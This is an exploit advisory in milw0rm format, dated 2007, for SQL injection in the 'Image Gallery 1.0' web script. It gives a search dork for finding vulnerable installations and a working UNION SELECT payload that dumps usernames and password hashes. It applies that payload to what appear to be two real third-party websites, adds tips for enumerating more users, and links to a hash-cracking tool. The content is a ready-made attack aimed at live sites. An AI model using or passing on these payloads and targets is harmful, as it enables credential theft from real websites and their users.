--==+================================================================================+==--
--==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SCRIPT DOWNLOAD: N/A
SITE: http://www.elkagroup.com/
DORK: intext:elkagroup Image Gallery v1.0
DESCRIPTION: With this vuln you can display every user:hash in the database
EXPLOITS:
EXPLOIT 1: http://www.server.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
EXAMPLES:
EXAMPLE 1: http://www.abfa-esfahan.com/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
EXAMPLE 2 (getting diffrent user): http://www.qanat.info/en/gallery/property.php?cid=0&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%20not%20in%20(0x71616E6174696E)
NOTE/TIP: hex the first username you get with EXAMPLE 1 then use EXAMPLE 2 and replace the hex with your new hex, To get diffrent users.
Also sometimes te columns may vary so if its not working correct, add a few columns and remove a few, Enjoy.
NOTE/TIP: The md5 has 13 characters removed from the end.
Cracking Hashes: the hash this script uses is a modifed MD5 i have coded a tool for any type of md5 hash it works very well and is extremely fast while
leaveing your cpu untouched, download it here: http://www.h4cky0u-filez.org/5819352
GREETZ: str0ke, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+==--
--==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2007-06-26]
